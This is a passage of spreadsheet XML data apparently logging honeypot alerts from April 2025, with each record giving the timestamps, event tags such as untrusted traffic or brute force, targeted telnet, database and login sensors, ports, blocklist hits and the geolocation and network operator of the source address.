    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a75:1c7d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1438"/>
    <x v="1438"/>
    <s v="183178218019.ctinets.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-16T22:10:19"/>
    <d v="2025-02-18T22:48:22"/>
    <d v="2025-04-16T22:10:19"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3702"/>
    <s v="114.13"/>
    <s v="9269"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="Hong Kong Broadband Network Ltd"/>
    <s v="residential"/>
    <s v="Hong Kong Broadband Network Limited"/>
    <s v="2009-11-26"/>
    <s v="HKBN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b7b2:da13"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1439"/>
    <x v="1439"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T21:52:22"/>
    <d v="2025-04-16T21:52:22"/>
    <d v="2025-04-16T21:52:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Group"/>
    <s v="corporate"/>
    <s v="Viettel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b44:3eeb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1440"/>
    <x v="1440"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T21:12:18"/>
    <d v="2025-04-16T21:12:18"/>
    <d v="2025-04-16T21:12:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="101"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="212238"/>
    <s v="CDNEXT"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="DataCamp Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/27.0 Chrome/125.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a996:c456"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1441"/>
    <x v="1441"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T21:05:58"/>
    <d v="2025-04-14T01:08:51"/>
    <d v="2025-04-16T21:05:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Beyoğlu"/>
    <s v="Beyoğlu"/>
    <s v="750640"/>
    <s v="NA"/>
    <s v="41.0315"/>
    <s v="28.9748"/>
    <s v="16135"/>
    <s v="TURKCELL ILETISIM HIZMETLERI A.S."/>
    <s v="Turkcell Iletisim Hizmetleri A.S."/>
    <s v="business"/>
    <s v="Turkcell Iletisim Hizmetleri"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b0ed:a11d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1442"/>
    <x v="1442"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T21:05:04"/>
    <d v="2025-04-16T21:05:04"/>
    <d v="2025-04-16T21:05:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3615"/>
    <s v="114.133"/>
    <s v="137872"/>
    <s v="PEOPLESPHONE-HK"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="consumer"/>
    <s v="China Mobile Hong Kong Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:df7a:5a27"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1443"/>
    <x v="1443"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T20:58:03"/>
    <d v="2025-04-16T20:45:20"/>
    <d v="2025-04-16T20:58:03"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="None"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:6d45"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1444"/>
    <x v="1444"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T20:40:47"/>
    <d v="2025-04-16T20:40:47"/>
    <d v="2025-04-16T20:40:47"/>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3d01:f5f3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1445"/>
    <x v="1445"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T20:37:34"/>
    <d v="2025-04-16T18:23:08"/>
    <d v="2025-04-16T20:37:34"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="20"/>
    <s v="Sliven"/>
    <s v="Kotel"/>
    <s v="Kotel"/>
    <s v="730073"/>
    <s v="8970"/>
    <s v="42.8833"/>
    <s v="26.45"/>
    <s v="60784"/>
    <s v="Iradeum Trading Ltd."/>
    <s v="Iradeum Trading Ltd."/>
    <s v="business"/>
    <s v="Neterra Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:253c:8896"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1446"/>
    <x v="1446"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T20:30:04"/>
    <d v="2025-04-16T20:00:50"/>
    <d v="2025-04-16T20:30:04"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:8be0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1447"/>
    <x v="1447"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T20:29:59"/>
    <d v="2025-01-03T01:43:43"/>
    <d v="2025-04-16T20:29:59"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23&amp;&amp;34994"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (MIDC Industrial Area)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.0652"/>
    <s v="73.0289"/>
    <s v="134540"/>
    <s v="Tata Teleservices (Maharashtra) Ltd"/>
    <s v="Tata Teleservices LTD - Tata Indicom - Cdma Division"/>
    <s v="cellular"/>
    <s v="Tata Teleservices LTD"/>
    <s v="2010-08-31"/>
    <s v="TATATELESERVICES"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e60:53fe"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1448"/>
    <x v="1448"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T20:10:12"/>
    <d v="2025-04-16T20:09:04"/>
    <d v="2025-04-16T20:10:12"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7b12:8ece"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1449"/>
    <x v="1449"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T19:59:11"/>
    <d v="2025-04-16T19:42:48"/>
    <d v="2025-04-16T19:59:11"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5c88"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1450"/>
    <x v="1450"/>
    <s v="NA&amp;&amp;syn-066-024-132-106.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-16T19:44:53"/>
    <d v="2025-04-13T20:20:34"/>
    <d v="2025-04-16T19:44:53"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Chemung"/>
    <s v="Elmira"/>
    <s v="5116497"/>
    <s v="14903"/>
    <s v="42.1386"/>
    <s v="-76.8836"/>
    <s v="11351"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications Inc"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="2000-09-28"/>
    <s v="ROADRUNNER-NYS"/>
    <s v="2011-07-06"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4218:846a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1451"/>
    <x v="1451"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T18:59:25"/>
    <d v="2025-04-16T18:49:36"/>
    <d v="2025-04-16T18:59:25"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:e3f1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1452"/>
    <x v="1452"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T18:25:08"/>
    <d v="2025-01-20T19:57:38"/>
    <d v="2025-04-16T18:25:08"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CO"/>
    <s v="Colombia"/>
    <s v="DC"/>
    <s v="Bogota D.C."/>
    <s v="Bogotá  D.C."/>
    <s v="Bogotá (Comuna Chapinero)"/>
    <s v="3688689"/>
    <s v="NA"/>
    <s v="4.64814"/>
    <s v="-74.0593"/>
    <s v="10620"/>
    <s v="Telmex Colombia S.A."/>
    <s v="Telmex Colombia S.A."/>
    <s v="residential"/>
    <s v="Telmex Colombia S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be93:b5f3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1453"/>
    <x v="1453"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T18:11:27"/>
    <d v="2025-04-08T08:43:59"/>
    <d v="2025-04-16T18:11:27"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Pinheiral"/>
    <s v="Pinheiral"/>
    <s v="3453767"/>
    <s v="NA"/>
    <s v="-22.5128"/>
    <s v="-44.0006"/>
    <s v="7738"/>
    <s v="V tal"/>
    <s v="V tal"/>
    <s v="business"/>
    <s v="Telemar Norte Leste S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bf00:542c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1454"/>
    <x v="1454"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-16T18:10:23"/>
    <d v="2024-09-10T01:32:00"/>
    <d v="2025-04-16T18:10:23"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;161&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="44"/>
    <s v="Chungcheongnam-do"/>
    <s v="Cheongyang-gun"/>
    <s v="Cheongyang-gun (Cheongyang-eup)"/>
    <s v="1845490"/>
    <s v="NA"/>
    <s v="36.4535"/>
    <s v="126.807"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
